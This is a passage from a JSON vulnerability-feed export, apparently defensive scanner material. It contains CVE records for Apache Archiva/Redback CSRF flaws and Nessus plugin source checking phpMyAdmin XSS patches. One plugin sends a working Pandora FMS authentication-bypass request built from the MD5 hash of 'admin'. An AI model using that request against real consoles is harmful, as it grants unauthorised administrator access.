"cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.0:beta:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.0:rc1:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:30:34", "description": "Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1; and Apache Continuum 1.3.6, 1.4.0, and 1.1 through 1.2.3.1; allows remote attackers to hijack the authentication of administrators for requests that modify credentials.", "cvss3": {}, "published": "2010-12-06T20:13:00", "type": "cve", "title": "CVE-2010-3449", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3449"], "modified": "2018-10-10T20:02:00", "cpe": ["cpe:/a:apache:archiva:1.2", "cpe:/a:jesse_mcconnell:redback:1.1.2", "cpe:/a:jesse_mcconnell:redback:1.2.1", "cpe:/a:apache:archiva:1.0", "cpe:/a:jesse_mcconnell:redback:1.2", "cpe:/a:apache:archiva:1.1", "cpe:/a:apache:archiva:1.3.1", "cpe:/a:apache:archiva:1.2.2", "cpe:/a:apache:archiva:1.1.2", "cpe:/a:apache:archiva:1.1.4", "cpe:/a:jesse_mcconnell:redback:1.0.2", "cpe:/a:apache:archiva:1.0.1", "cpe:/a:apache:archiva:1.0.3", "cpe:/a:jesse_mcconnell:redback:1.2.3", "cpe:/a:jesse_mcconnell:redback:1.2.2", "cpe:/a:apache:archiva:1.3", "cpe:/a:apache:archiva:1.1.1", "cpe:/a:jesse_mcconnell:redback:1.1", "cpe:/a:jesse_mcconnell:redback:1.0.1", "cpe:/a:apache:archiva:1.2.1", "cpe:/a:apache:archiva:1.0.2", "cpe:/a:jesse_mcconnell:redback:1.0.3", "cpe:/a:jesse_mcconnell:redback:1.0", "cpe:/a:apache:archiva:1.1.3", "cpe:/a:jesse_mcconnell:redback:1.1.1"], "id": "CVE-2010-3449", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3449", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:archiva:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:jesse_mcconnell:redback:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:jesse_mcconnell:redback:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:jesse_mcconnell:redback:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:jesse_mcconnell:redback:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:jesse_mcconnell:redback:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:jesse_mcconnell:redback:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:jesse_mcconnell:redback:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:jesse_mcconnell:redback:1.0:alpha4:*:*:*:*:*:*", "cpe:2.3:a:jesse_mcconnell:redback:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:jesse_mcconnell:redback:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:jesse_mcconnell:redback:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:jesse_mcconnell:redback:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:jesse_mcconnell:redback:1.2:beta1:*:*:*:*:*:*", "cpe:2.3:a:jesse_mcconnell:redback:1.2:beta2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:48:00", "description": "Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.", "cvss3": {}, "published": "2010-12-06T20:13:00", "type": "cve", "title": "CVE-2010-4408", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3449", "CVE-2010-4408"], "modified": "2018-10-10T20:08:00", "cpe": ["cpe:/a:apache:archiva:1.2.2", "cpe:/a:apache:archiva:1.2", "cpe:/a:apache:archiva:1.1.4", "cpe:/a:apache:archiva:1.0", "cpe:/a:apache:archiva:1.2.1", "cpe:/a:apache:archiva:1.0.1", "cpe:/a:apache:archiva:1.1", "cpe:/a:apache:archiva:1.1.3", "cpe:/a:apache:archiva:1.3.1", "cpe:/a:apache:archiva:1.3", "cpe:/a:apache:archiva:1.1.1", "cpe:/a:apache:archiva:1.0.3", "cpe:/a:apache:archiva:1.1.2", "cpe:/a:apache:archiva:1.0.2"], "id": "CVE-2010-4408", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4408", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:archiva:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:archiva:1.0.1:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2022-04-12T15:24:24", "description": "The Pandora FMS console hosted on the remote web server is affected by an authentication bypass vulnerability. The 'auto login (hash) password' feature allows third parties to authenticate using a combination of username and a shared secret. This shared secret is undefined by default, which means it is possible to authenticate solely by providing the hash of a valid username.\n\nA remote attacker can exploit this issue to access the console as admin.\n\nThis version of Pandora FMS is also affected by other vulnerabilities;\nhowever, Nessus has not tested for those issues.", "cvss3": {"score": null, "vector": null}, "published": "2010-12-01T00:00:00", "type": "nessus", "title": "Pandora FMS Console Authentication Bypass", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4279"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:artica:pandora_fms"], "id": "PANDORA_FMS_AUTH_BYPASS.NASL", "href": "https://www.tenable.com/plugins/nessus/50861", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50861);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2010-4279\");\n script_bugtraq_id(45112);\n script_xref(name:\"EDB-ID\", value:\"15639\");\n\n script_name(english:\"Pandora FMS Console Authentication Bypass\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web console on the remote host is affected by an authentication\nbypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Pandora FMS console hosted on the remote web server is affected by\nan authentication bypass vulnerability. The 'auto login (hash) password'\nfeature allows third parties to authenticate using a combination of\nusername and a shared secret. This shared secret is undefined by\ndefault, which means it is possible to authenticate solely by\nproviding the hash of a valid username.\n\nA remote attacker can exploit this issue to access the console as\nadmin.\n\nThis version of Pandora FMS is also affected by other vulnerabilities;\nhowever, Nessus has not tested for those issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://openideas.info/smf/index.php/topic,1825.0.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://openideas.info/smf/index.php/topic,2083.0.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the security fix for Pandora FMS 3.1, or upgrade to version\n3.1.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Pandora FMS v3.1 Auth Bypass and Arbitrary File Upload Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/11/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:artica:pandora_fms\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"pandora_fms_console_detect.nasl\");\n script_require_keys(\"installed_sw/Pandora FMS\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = 'Pandora FMS';\nget_install_count(app_name:app, exit_if_zero:TRUE);\nport = get_http_port(default:80, php:TRUE);\ninstall = get_single_install(app_name:app, port:port);\n\nuser = 'admin';\nhash = hexstr(MD5(user));\nurl = install['path'] + '/index.php?loginhash_data=' + hash + '&loginhash_user=' + user + '&loginhash=1';\nres = http_send_recv3(method:'GET', item:url, port:port, exit_on_fail:TRUE);\n\nif ('[<b>' + user + '</b>]</a>' >< res[2])\n{\n if (report_verbosity > 0)\n {\n # In vulnerable versions, we'll be able to fingerprint the vulnerability even\n # if we're unable to guess a valid username (the page header indicates we're\n # logged in, but nothing in the console is available). If this happens, we\n # should probably make a note of it\n if (\n 'Welcome to Pandora FMS Web Console</ul>' >!< res[2] ||\n 'Access to this page is restricted to authorized users only' >< res[2]\n )\n {\n trailer =\n 'Nessus attempted to login as \"' + user + '\" which does not appear to be a\\n' +\n 'valid user. This means Nessus was able to verify the vulnerability,\\n' +\n 'but was unable to get unauthorized access to the console.';\n }\n else trailer = NULL;\n\n report =\n 'Nessus was able to verify the issue using the following URL :\\n\\n' +\n ' ' + build_url(qs:url, port:port) + '\\n';\n if (!isnull(trailer)) report += '\\n' + trailer;\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse\n{\n base = build_url(qs:install['dir'], port:port);\n audit(AUDIT_WEB_APP_NOT_AFFECTED, app, base);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T13:02:12", "description": "Versions of phpMyAdmin 2.x prior to 2.11.11.1, or 3.x prior to 3.3.8.1 are potentially affected by a cross-site scripting vulnerability in the database search tool.", "cvss3": {"score": 4.8, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"}, "published": "2010-11-30T00:00:00", "type": "nessus", "title": "phpMyAdmin 2.x < 2.11.11.1 / 3.x < 3.3.8.1 XSS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4329"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*"], "id": "5716.PRM", "href": "https://www.tenable.com/plugins/nnm/5716", "sourceData": "Binary data 5716.prm", "cvss": {"score": 5.8, "vector": "CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-08-19T13:02:16", "description": "phpMyAdmin team reports :\n\nIt was possible to conduct a XSS attack using spoofed request on the db search script.", "cvss3": {"score": null, "vector": null}, "published": "2010-11-30T00:00:00", "type": "nessus", "title": "FreeBSD : phpMyAdmin -- XSS attack in database search (753f8185-5ba9-42a4-be02-3f55ee580093)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4329"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:phpMyAdmin", "p-cpe:/a:freebsd:freebsd:phpMyAdmin211", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_753F81855BA942A4BE023F55EE580093.NASL", "href": "https://www.tenable.com/plugins/nessus/50838", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50838);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2010-4329\");\n\n script_name(english:\"FreeBSD : phpMyAdmin -- XSS attack in database search (753f8185-5ba9-42a4-be02-3f55ee580093)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"phpMyAdmin team reports :\n\nIt was possible to conduct a XSS attack using spoofed request on the\ndb search script.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=152685\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=152686\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2010-8.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2010-8/\"\n );\n # https://vuxml.freebsd.org/freebsd/753f8185-5ba9-42a4-be02-3f55ee580093.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0088aa48\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin211\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/11/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin<3.3.8.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin211<2.11.11.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T13:02:25", "description": "Changes for 3.3.8.1 (2010-11-29)\n\n - [security] XSS on db search, see PMASA-2010-8\n\n - http://www.phpmyadmin.net/home_page/security/PMASA-201 0-8.php\n\n - CVE-2010-4329\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2010-12-09T00:00:00", "type": "nessus", "title": "Fedora 14 : phpMyAdmin-3.3.8.1-1.fc14 (2010-18343)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4329"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpMyAdmin", "cpe:/o:fedoraproject:fedora:14"], "id": "FEDORA_2010-18343.NASL", "href": "https://www.tenable.com/plugins/nessus/51081", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-18343.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51081);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2010-4329\");\n script_bugtraq_id(45100);\n script_xref(name:\"FEDORA\", value:\"2010-18343\");\n\n script_name(english:\"Fedora 14 : phpMyAdmin-3.3.8.1-1.fc14 (2010-18343)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Changes for 3.3.8.1 (2010-11-29)\n\n - [security] XSS on db search, see PMASA-2010-8\n\n -\n http://www.phpmyadmin.net/home_page/security/PMASA-201\n 0-8.php\n\n - CVE-2010-4329\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2010-8.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2010-8/\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-December/051942.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4dd97623\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"phpMyAdmin-3.3.8.1-1.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T13:02:19", "description": "Changes for 3.3.8.1 (2010-11-29)\n\n - [security] XSS on db search, see PMASA-2010-8\n\n - http://www.phpmyadmin.net/home_page/security/PMASA-201 0-8.php\n\n - CVE-2010-4329\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2010-12-09T00:00:00", "type": "nessus", "title": "Fedora 13 : phpMyAdmin-3.3.8.1-1.fc13 (2010-18371)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4329"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpMyAdmin", "cpe:/o:fedoraproject:fedora:13"], "id": "FEDORA_2010-18371.NASL", "href": "https://www.tenable.com/plugins/nessus/51082", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-18371.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51082);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2010-4329\");\n script_bugtraq_id(45100);\n script_xref(name:\"FEDORA\", value:\"2010-18371\");\n\n script_name(english:\"Fedora 13 : phpMyAdmin-3.3.8.1-1.fc13 (2010-18371)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Changes for 3.3.8.1 (2010-11-29)\n\n - [security] XSS on db search, see PMASA-2010-8\n\n -\n http://www.phpmyadmin.net/home_page/security/PMASA-201\n 0-8.php\n\n - CVE-2010-4329\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2010-8.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2010-8/\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-December/051956.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1e2b4838\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", 